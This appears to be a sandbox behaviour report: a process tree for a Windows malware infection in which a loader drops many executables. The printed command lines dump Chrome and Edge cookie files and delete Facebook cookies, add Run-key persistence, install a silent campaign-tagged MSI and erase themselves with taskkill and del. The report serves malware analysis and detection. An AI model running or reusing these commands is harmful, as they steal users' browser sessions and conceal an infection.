                                                                                                                                                            timeout /t 6
                                                                                                                                                            8⤵
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            PID:4260
                                                                                                                                                      • C:\Users\Admin\Documents\spHtaaYhE19k6LFho8uCuFxX.exe
                                                                                                                                                        "C:\Users\Admin\Documents\spHtaaYhE19k6LFho8uCuFxX.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3692
                                                                                                                                                      • C:\Users\Admin\Documents\An67e4bEmBPkRTx5SRDdLkE5.exe
                                                                                                                                                        "C:\Users\Admin\Documents\An67e4bEmBPkRTx5SRDdLkE5.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4240
                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops startup file
                                                                                                                                                          PID:4944
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5344
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5448
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5948
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:6056
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5924
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5956
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                              PID:5172
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4304
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:4292
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:188
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3280
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:6120
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:5648
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2172
                                                                                                                                                              • C:\Users\Admin\Documents\DZUAuX1qY1cUPiz1I9lz6QIs.exe
                                                                                                                                                                "C:\Users\Admin\Documents\DZUAuX1qY1cUPiz1I9lz6QIs.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4120
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5264
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5752
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2616
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3920
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4120 -s 1532
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6080
                                                                                                                                                              • C:\Users\Admin\Documents\frHSx9kGX28N7FVjiXrgvYx6.exe
                                                                                                                                                                "C:\Users\Admin\Documents\frHSx9kGX28N7FVjiXrgvYx6.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4132
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 656
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4924
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 668
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4620
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 640
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4304
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 636
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:2652
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1128
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:5388
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1188
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:5616
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 1228
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:6088
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "frHSx9kGX28N7FVjiXrgvYx6.exe" /f & erase "C:\Users\Admin\Documents\frHSx9kGX28N7FVjiXrgvYx6.exe" & exit
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5384
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /im "frHSx9kGX28N7FVjiXrgvYx6.exe" /f
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:5992
                                                                                                                                                                • C:\Users\Admin\Documents\C3W96tTdvhanzMHtZwYwwKkc.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\C3W96tTdvhanzMHtZwYwwKkc.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3324
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6597075.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6597075.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:1172
                                                                                                                                                                • C:\Users\Admin\Documents\8r37DV8pNkgBb8Qqh2lQsHIU.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\8r37DV8pNkgBb8Qqh2lQsHIU.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5080
                                                                                                                                                                    • C:\Users\Admin\Documents\8r37DV8pNkgBb8Qqh2lQsHIU.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\8r37DV8pNkgBb8Qqh2lQsHIU.exe" -q
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4340
                                                                                                                                                                  • C:\Users\Admin\Documents\b7nKhvAZEdo6fxYrm692xAIC.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\b7nKhvAZEdo6fxYrm692xAIC.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:2760
                                                                                                                                                                      • C:\Users\Admin\Documents\b7nKhvAZEdo6fxYrm692xAIC.exe
                                                                                                                                                                        C:\Users\Admin\Documents\b7nKhvAZEdo6fxYrm692xAIC.exe
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5628
                                                                                                                                                                    • C:\Users\Admin\Documents\OsoHkECPLKI6o47t5zkFm0tp.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\OsoHkECPLKI6o47t5zkFm0tp.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:4440
                                                                                                                                                                    • C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:3844
                                                                                                                                                                        • C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe
                                                                                                                                                                          C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4384
                                                                                                                                                                        • C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe
                                                                                                                                                                          C:\Users\Admin\Documents\n2Q_BHCquRNwqb9DA92n2935.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4368
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:5980
                                                                                                                                                                        • C:\Users\Admin\Documents\9bUVA6OJxkWpIXhKiKMli_od.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\9bUVA6OJxkWpIXhKiKMli_od.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1136
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "9bUVA6OJxkWpIXhKiKMli_od.exe" /f & erase "C:\Users\Admin\Documents\9bUVA6OJxkWpIXhKiKMli_od.exe" & exit
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5080
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im "9bUVA6OJxkWpIXhKiKMli_od.exe" /f
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:2652
                                                                                                                                                                            • C:\Users\Admin\Documents\8HMl939zUFReJjugT1qqQ7wS.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\8HMl939zUFReJjugT1qqQ7wS.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              • NTFS ADS
                                                                                                                                                                              PID:2612
                                                                                                                                                                            • C:\Users\Admin\Documents\nRvh3NxljxZA3cwc_fRYAmMS.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\nRvh3NxljxZA3cwc_fRYAmMS.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:3104
                                                                                                                                                                            • C:\Users\Admin\Documents\JHMidb4XeklHT4vaqyNydTUh.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\JHMidb4XeklHT4vaqyNydTUh.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5508
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-SNBO0.tmp\JHMidb4XeklHT4vaqyNydTUh.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-SNBO0.tmp\JHMidb4XeklHT4vaqyNydTUh.tmp" /SL5="$5020A,138429,56832,C:\Users\Admin\Documents\JHMidb4XeklHT4vaqyNydTUh.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                PID:5600
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-U2LON.tmp\Setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-U2LON.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  PID:5624
                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:5916
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5964
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        PID:3128
                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628034554 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:6968
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:6004
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-CH06O.tmp\GameBoxWin32.tmp
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-CH06O.tmp\GameBoxWin32.tmp" /SL5="$202CE,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                              10⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:5212
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-DK6F9.tmp\Daldoula.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-DK6F9.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:6940
                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                    dw20.exe -x -s 1292
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:4964
                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                PID:5904
                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:5784
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1016825.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1016825.exe"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:6092
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1156604.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1156604.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                    PID:5644
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      PID:504
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5143396.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5143396.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1130188.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1130188.exe"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:4304
                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:5276
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:7128
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:7020
                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:5908
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:6508
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill /im GameBox64bit.exe /f
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:6728
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:6688
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:3424
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS46A22304\sonia_6.exe
                                                                                                                                                                                                        sonia_6.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                        PID:2708
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:4112
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:1056
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:2088
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:2976
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 536
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2180
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                            PID:1536
                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:4084
                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4304
                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                          PID:2184
